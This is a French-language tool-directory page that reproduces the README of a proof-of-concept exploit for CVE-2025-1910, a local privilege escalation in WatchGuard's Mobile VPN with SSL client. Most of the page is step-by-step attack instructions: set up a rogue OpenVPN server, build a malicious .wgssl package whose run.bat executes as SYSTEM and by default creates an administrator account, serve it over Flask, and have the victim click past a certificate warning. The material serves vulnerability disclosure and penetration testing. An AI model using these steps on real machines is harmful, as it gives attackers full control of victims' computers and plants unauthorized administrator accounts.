Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1910-WatchGuard-Privilege-Escalation — Preuve de concept pour l'exploitation de CVE-2025-1910, une escalade de privilèges locaux au sein du client Mobile VPN with SSL de Watchguard. | Kitploit
Outils/GitHubGitHub/lutrasecurity/cve-2025-1910-watchguard-privilege-escalation
Escalade de PrivilègesGénération de PayloadsAnalyse des VulnérabilitésExploitationMouvement LatéralPost-ExploitationTests d'IntrusionCommandement et ContrôleRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHublutrasecurity/cve-2025-1910-watchguard-privilege-escalation

CVE-2025-1910-WatchGuard-Privilege-Escalation

Preuve de concept pour l'exploitation de CVE-2025-1910, une escalade de privilèges locaux au sein du client Mobile VPN with SSL de Watchguard.

Voir le dépôt
3il y a 8 moisPas encore vérifié

WatchGuard Mobile VPN with SSL Client Privilege Escalation (CVE-2025-1910)

Une vulnérabilité d'élévation de privilèges dans Mobile VPN with SSL de WatchGuard <= 12.11.2 permet à un utilisateur à faibles privilèges d'exécuter des commandes en tant que SYSTEM sur le client. Testé avec la version 12.11.2 de Mobile VPN with SSL.

Pour plus de détails, consultez notre article de blog (version allemande).

Exploitation

Préparation sur le serveur attaquant

  1. Démarrer un serveur OpenVPN qui accepte toutes les connexions :
root@kitploit:~
sudo openvpn --config server.conf

Serveur OpenVPN démarré.

  1. Modifier l'option remote dans ./client/client.ovpn pour pointer vers le serveur OpenVPN

  2. Modifier ./client/run.bat selon vos besoins, ce script sera exécuté en tant que SYSTEM. Par défaut, un nouvel utilisateur administrateur est créé (shinyNewAdmin)

  3. Créer le fichier malveillant WatchGuard client.wgssl :

root@kitploit:~
cd client/

# Create checksum
md5sum client.ovpn run.bat > MD5SUM

# Pack into a .wgssl file
tar -czf ../client_exploit.wgssl client.ovpn  MD5SUM  run.bat

cd ..
  1. Servir le fichier malveillant client.wgssl via flask :
root@kitploit:~
# Start the flask HTTPS server
sudo python3 srv.py

Serveur web Flask démarré.

Optionnellement, une nouvelle paire de certificat et clé peut être créée via openssl :

root@kitploit:~
# Create certificate and private key for the HTTPS connection
openssl req -x509 -newkey rsa:4096 -nodes -out server.crt -keyout server.key -days 365 -subj "/CN=firebox"

Exploitation sur la machine victime

Ensuite, sur la machine victime où une version vulnérable de Mobile VPN with SSL est installée (par exemple la version 12.11.2, Téléchargement), essayez de vous connecter au serveur attaquant. Le nom d'utilisateur et le mot de passe saisis n'ont pas d'importance :

Connexion au serveur attaquant.

Cliquez sur Oui dans l'alerte de sécurité pour ignorer les avertissements de certificat :

Connexion au serveur attaquant.

Après que la connexion est établie avec succès, le fichier run.bat est exécuté et l'utilisateur shinyNewAdmin est créé :

L'utilisateur shinyNewAdmin a été créé.

Configuration

Sur le serveur attaquant, vous devez avoir Python, openssl et openvpn installés. De plus, le paquet Python flask doit être installé :

root@kitploit:~
pip install -r requirements.txt

Nix Flake

Avec Nix installé, vous pouvez simplement démarrer le shell de développement :

root@kitploit:~
nix develop
Télécharger l’outil